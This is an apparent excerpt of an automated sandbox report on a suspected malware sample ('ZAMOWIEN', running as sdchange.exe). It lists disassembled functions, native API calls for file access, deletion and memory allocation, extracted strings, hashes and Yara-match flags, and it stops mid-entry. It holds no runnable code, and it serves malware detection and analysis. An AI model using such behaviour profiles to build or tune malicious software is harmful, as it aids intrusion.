Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 707ba5b38e2c8aaf3c7afd995fa561e7c41e224d1c542ab44305c64757ce014a
Instruction ID: a1d8d0087a9966ed17c7a233cf24a4388f33246b5b1df49db6696fb976c59256
Opcode Fuzzy Hash: 707ba5b38e2c8aaf3c7afd995fa561e7c41e224d1c542ab44305c64757ce014a
Instruction Fuzzy Hash: 7541AD7EA053A8DFDB11CE6C8840A567BF4AF89794F010669ECD8AB351DB31D800CB91

Function 328A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 328A238D
___swprintf_l.LIBCMT ref: 328A23B3

Strings

]:%u, xrefs: 328A23AA
%%%u, xrefs: 328A2384

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 1c03b4da94d137c0e78f8d4aceeadc2d6b2b02857c526058e3396a41a3804129
Instruction ID: 8b8078ef8fed5794bc1bb424cc928da8b3fd526a1ab8989e11b9f57f4049287e
Opcode Fuzzy Hash: 1c03b4da94d137c0e78f8d4aceeadc2d6b2b02857c526058e3396a41a3804129
Instruction Fuzzy Hash: 6D31847A9002299FDB20CE28CC50BEF77F8FF45754F844556E849E3244EF309A558BA0

Function 32875F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 32875F8F
RtlDebugPrintTimes.NTDLL ref: 32875FB1
RtlDebugPrintTimes.NTDLL ref: 32875FBE

Strings

Wow64 Emulation Layer, xrefs: 32875F89

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 43d4a69561a1f2d732a4013794be3d410e8b8646b9bf186fef99ac8f30f70c2d
Instruction ID: 948fa9dbbcf3006d2867398e3bd73ada9dc31b81723ce8085c8bd03084cb0196
Opcode Fuzzy Hash: 43d4a69561a1f2d732a4013794be3d410e8b8646b9bf186fef99ac8f30f70c2d
Instruction Fuzzy Hash: 65214AB990111DBFEB019EA8CC84DFF7B7DEF447D8B004464FA15A6140DA749E069F60

Function 328C7CD6 Relevance: 6.4, APIs: 4, Instructions: 397timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 328C7D16
RtlDebugPrintTimes.NTDLL ref: 328C7D8D
RtlDebugPrintTimes.NTDLL ref: 328C7F2F
RtlDebugPrintTimes.NTDLL ref: 328C803E

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: e2193629933111cae726056ff3f42f67e4a79d0966e8dc0018b7e90776a750e3
Instruction ID: 525be48f8dacc785aa0b2337234d79f2200354f89cd4677515580039f6bcc0bd
Opcode Fuzzy Hash: e2193629933111cae726056ff3f42f67e4a79d0966e8dc0018b7e90776a750e3
Instruction Fuzzy Hash: CCE15175A40319AFDB15CFA4D881BEEFBB8BF44354F10852AEA15EB280D770EA45CB50

Function 3281EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7af6436fa81f3ce9fc3b855d1c27f692ea96b6be3053bb74b072ff1a1dd951
Instruction ID: 4839e8b34cbd2ca92206dae952fe136a03a1329929fdf2b57ee91dda547923e4
Opcode Fuzzy Hash: 9b7af6436fa81f3ce9fc3b855d1c27f692ea96b6be3053bb74b072ff1a1dd951
Instruction Fuzzy Hash: FAE103B8D00708DFDB25CFA9C980A8DBBF1FF58354F20456AE959A76A1DB70A841CF50

Function 3286EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3286EFE1
RtlDebugPrintTimes.NTDLL ref: 3286F009
RtlDebugPrintTimes.NTDLL ref: 3286F0AC
RtlDebugPrintTimes.NTDLL ref: 3286F160

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c27c0f256558b3a026338a63302930503eb8af3c097526c48409916782ac04e3
Instruction ID: 167359068aa39e35fe10a90e9503715f1f0833de8aef9170603de6a6474bc82e
Opcode Fuzzy Hash: c27c0f256558b3a026338a63302930503eb8af3c097526c48409916782ac04e3
Instruction Fuzzy Hash: 5C712979E002199FDF05CFA8C980BEDBBB5BF58358F14406AEA06EB254DB749905CB90

Function 328CA4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 328CA577
RtlDebugPrintTimes.NTDLL ref: 328CA62A
RtlDebugPrintTimes.NTDLL ref: 328CA64E
RtlDebugPrintTimes.NTDLL ref: 328CA663

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5ef5a8c678b8e3e3e79f274eef830aeb5eb3b250a0e302a0438d4ced9fcb2b5e
Instruction ID: d99d62e3e74566a540ef6c0b960787cb2982a38748b840fdf845ec32296f019a
Opcode Fuzzy Hash: 5ef5a8c678b8e3e3e79f274eef830aeb5eb3b250a0e302a0438d4ced9fcb2b5e
Instruction Fuzzy Hash: 2D516A7D7016269FEB08CE98C9A4A99B7F1FB88354B10816DD90ADB750DB74EC41CB80

Function 3286F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3286F26D
RtlDebugPrintTimes.NTDLL ref: 3286F292
RtlDebugPrintTimes.NTDLL ref: 3286F324
RtlDebugPrintTimes.NTDLL ref: 3286F378

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b77068c656dc8df936b78854b5a8809405847b51f9425dc5ef018f05df796777
Instruction ID: 37518e5ef1e19f2c9f3a0ccbf3051e35621e22865de122c1ee9e3b099643111b
Opcode Fuzzy Hash: b77068c656dc8df936b78854b5a8809405847b51f9425dc5ef018f05df796777
Instruction Fuzzy Hash: A95139B9D00219DFDF04CF98C941AEDBBB1BF58358F18812AEA16BB250DB789941CF54

Function 32827B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 32827B52
BaseThreadInitThunk.KERNEL32 ref: 32827B5C
RtlDebugPrintTimes.NTDLL ref: 328649ED
RtlDebugPrintTimes.NTDLL ref: 32864A70

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: b01e47de60db39a8c668cbc52c99862bee4cbb6a9100aa2b76dec438e6063450
Instruction ID: 939150427f4c1001073b080cc7599387e3082f0ace916b07e84d148f31c13eee
Opcode Fuzzy Hash: b01e47de60db39a8c668cbc52c99862bee4cbb6a9100aa2b76dec438e6063450
Instruction Fuzzy Hash: 11316779E41228EFCF10DFA8D844BADBBB0BF08320F10452AE621B7290CB359941CF50

Function 327F59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 32850AA7

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d9db03fe4ccc7df22a8f7db582ffaf578ae305f2ab6909de7d7eddd0f5e581d7
Instruction ID: 06b1cc5c9b112902d209e4c8bd3f77f62ea5166d2cd862fd585aee8593563be6
Opcode Fuzzy Hash: d9db03fe4ccc7df22a8f7db582ffaf578ae305f2ab6909de7d7eddd0f5e581d7
Instruction Fuzzy Hash: D4325A74D08369EFEB25CF64C984BD9BBB1BB08344F0040E9D559AB341EBB65A84CF91

Function 32837D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 32837E8B

Strings

+, xrefs: 32837DE8
-, xrefs: 32837DDD

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 14c000dcc59890595e58101c3419e8d44236b33c84a1357b9f94e91522938329
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 3991D8BCE022099FEB16DE59C8807AE77E1BF44764F50451AEA58E76C0DB70D940CF90

Function 32824C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

Flst, xrefs: 32824C96
0, xrefs: 32824CC3

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 60afe8b50b56eea42adf7e0fafe3dab65f3530463ffe8e3f27f9524dd957bf48
Instruction ID: c6e5c78c262cff42d3b2601ac4f090c5f84e576713c3248e60eb642452183e71
Opcode Fuzzy Hash: 60afe8b50b56eea42adf7e0fafe3dab65f3530463ffe8e3f27f9524dd957bf48
Instruction Fuzzy Hash: F351DDB9E01708CFEB14CF98C884759FBF4EF44B98F14802ED5099B241EB70A985CBA0

Function 327F04E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 327F055E

Strings

kLsE, xrefs: 327F0540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 327F063D

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: dcd4002f31d039df70188715e80c333a1dd0e90898b3e42996662e2e87f05ca1
Instruction ID: 7e8d7cfb40922b7933b944779ea5472d165def2842bb03931b7fc0d877e24603
Opcode Fuzzy Hash: dcd4002f31d039df70188715e80c333a1dd0e90898b3e42996662e2e87f05ca1
Instruction Fuzzy Hash: EA519CB9508752EFD714DF64C440A97B7E5BF88304F00883EE9A98B344EB769545CB92

Function 327EDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 327EE040

Strings

0, xrefs: 327EE00B
0, xrefs: 327EE020

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: a00097bb6edd9acdfe4fa80058c80f8af12f0c356f84c7d981f2b8db52684fc1
Instruction ID: 05d19f1f9cf0ba7050877a205271105b7e186b5b17a0fdc8e8cbb7763b8b76b6
Opcode Fuzzy Hash: a00097bb6edd9acdfe4fa80058c80f8af12f0c356f84c7d981f2b8db52684fc1
Instruction Fuzzy Hash: A3415BB56087069FD300CF28C584A1ABBE5BF8D358F04492EF989DB340D771EA06CB96

Analysis Process: sdchange.exePID: 5016, Parent PID: 744COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	4.2%
Signature Coverage:	0%
Total number of Nodes:	449
Total number of Limit Nodes:	73

Executed Functions

Function 030B9EF0 Relevance: 32.9, Strings: 26, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

n, xrefs: 030BA01F
jG, xrefs: 030BA175
sn, xrefs: 030BA275
P, xrefs: 030BA0A8
#, xrefs: 030BA2FC
d, xrefs: 030BA00B
xs, xrefs: 030B9F8B
~, xrefs: 030B9F67
&J, xrefs: 030B9F14
0, xrefs: 030BA2E6
4$, xrefs: 030BA14D
<;, xrefs: 030BA03D
4, xrefs: 030BA029
<m, xrefs: 030B9FCB
jB, xrefs: 030BA0D0
u, xrefs: 030BA1E6
z^jB, xrefs: 030BA416
e$, xrefs: 030BA143
NI, xrefs: 030B9FC1
#, xrefs: 030B9FF7
l, xrefs: 030BA0E3
SK, xrefs: 030BA11F
Y, xrefs: 030BA0B2
N=, xrefs: 030BA1B4
4, xrefs: 030BA0BC
c>, xrefs: 030BA228

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID:
String ID: #$&J$0$4$4$4$$<;$<m$N=$NI$P$SK$Y$c>$d$e$$jB$jG$l$n$sn$u$xs$z^jB$#$~
API String ID: 0-1260726500
Opcode ID: 2f5631f62cc9ab2d37fac11952d4e344aebb5dd58b95b9f2c96a1ea1f5aa60ad
Instruction ID: ba2be5351e8f0ba98751e48d92742978566c07740c10070c44dfd2d6f5408b4a
Opcode Fuzzy Hash: 2f5631f62cc9ab2d37fac11952d4e344aebb5dd58b95b9f2c96a1ea1f5aa60ad
Instruction Fuzzy Hash: 86229FB0E05268CBEB24CF45C994BDDBBB1BF44308F1085D9D549AB280DBB95E89CF64

Function 030CC980 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 030CCA5F
FindNextFileW.KERNELBASE(?,00000010), ref: 030CCA9E
FindClose.KERNELBASE(?), ref: 030CCAA9

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 0eb3f14c97ecc0e8090ecc047a6b0a7c66f012a122ec9c6dd3e71f3315d56bfe
Instruction ID: 9d24f7ae88868209db0f672f53ac88c08834a7399c1ee41268c9eed3e82e1f8f
Opcode Fuzzy Hash: 0eb3f14c97ecc0e8090ecc047a6b0a7c66f012a122ec9c6dd3e71f3315d56bfe
Instruction Fuzzy Hash: C2316375911349BBEB20DF64CC89FEF77BCAF84704F14455DB909AB180DA70AA85CBA0

Function 030D9590 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 030D968E

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1d980ee68297e093b9d09454ef77260a3d827c672f45c980b1ddf3436240fd61
Instruction ID: c0b6d8d64276c7bcf8d0ce1608d63eaedc57741441342708710e41aea0fff6f7
Opcode Fuzzy Hash: 1d980ee68297e093b9d09454ef77260a3d827c672f45c980b1ddf3436240fd61
Instruction Fuzzy Hash: 5F31D2B5A01248AFCB14DF98D881EEEB7F9EF8C310F108219F919A7340D770A941CBA5

Function 030D9700 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 030D97E3

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7894f5e172da81d415dc74cbb1cb8de4d35580a2dc344769630951a9b12c7089
Instruction ID: 1451eddfc1f889eb6023079430db7fb2ef3a45c97d36e3043c7b7e34da1e8231
Opcode Fuzzy Hash: 7894f5e172da81d415dc74cbb1cb8de4d35580a2dc344769630951a9b12c7089
Instruction Fuzzy Hash: 0D31E6B5A01249AFCB14DF98D981EEFB7F9EF88314F008219FD19A7240D770A9118BA5

Function 030D9A10 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(030C20FE,?,030D838E,00000000,00000004,00003000,?,?,?,?,?,030D838E,030C20FE,030D838E,89CC4589,030C20FE), ref: 030D9AD8

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1811d8ade43edb4bb4022eedc635174e8bf529350d1383489e10df948278cad0
Instruction ID: b89858f4eec7907cd84655325d758d2cfb70d1b269abb6fa604656faed6fcf35
Opcode Fuzzy Hash: 1811d8ade43edb4bb4022eedc635174e8bf529350d1383489e10df948278cad0
Instruction Fuzzy Hash: A621F9B5A11249AFDB14DF98D841EEFB7B9EF88710F008119FD19AB240D770A911CBA5

Function 030D97F0 Relevance: 1.6, APIs: 1, Instructions: 62filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 030D9889

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: defb8a24c5224e5bb6cc7739e7a1daa64279ef62ac2569a9b6a04582bc931386
Instruction ID: 41b2b93479c966f61ed0f35e2f480927813c69b5402ef717f999919b8f7359e6
Opcode Fuzzy Hash: defb8a24c5224e5bb6cc7739e7a1daa64279ef62ac2569a9b6a04582bc931386
Instruction Fuzzy Hash: 6411A375A417447FD610EB98CC41FEFB3ACDF84710F004159F909AB240E770750587A5

Function 030D98A0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030D98D7

Memory Dump Source

Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: ddf1df0a587fa80aea2360bb6993480b23bf9f2a8d51c71cb37594c8d390c493
Instruction ID: ee22a99872ea6d0fa24a31ee96c703834d5d799f26408d5bc86253fe545b102a
Opcode Fuzzy Hash: ddf1df0a587fa80aea2360bb6993480b23bf9f2a8d51c71cb37594c8d390c493
Instruction Fuzzy Hash: D1E046362413547BD620EA5ACC40FDB77ACDFC5764F004115FA08AB241CB71B9018BB4

Function 04FF4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF465A

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4f31d1fc23d9833ae06fa1b494894aade5a34cc494a8f928ce954efd8a79443
Instruction ID: 45eba7660dc67bf75c178a07bb17950001a0f9c663306b7a6751fc2f6427be43
Opcode Fuzzy Hash: e4f31d1fc23d9833ae06fa1b494894aade5a34cc494a8f928ce954efd8a79443
Instruction Fuzzy Hash: 689002626019108261407158984440A6015ABE23017D5D115A05545A4C861889559269

Function 04FF4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF434A

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f4b67a7d0dbcc7a05f16ac4cc6c395ead0ffb7614d46b293091aed45db9d3bb
Instruction ID: 855f153d0870f7bfada70072ae1be780c78913c13a56fdc9a5f86405836c572a
Opcode Fuzzy Hash: 1f4b67a7d0dbcc7a05f16ac4cc6c395ead0ffb7614d46b293091aed45db9d3bb
Instruction Fuzzy Hash: F0900232605C1052B140715898C454A4015ABE1301F95D011E0424598C8A148A565361

Function 04FF2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FF2CAA

Memory Dump Source

Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true

Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f97e7dfcb22a3bc6c53eeeaaa5f28ed75f17e3437f6e437eb72f302a4e552b5
Instruction ID: 97cfb30e4392db13215d86470dbe1df8f9f97a8851cde8645a1f4ba870e7f716
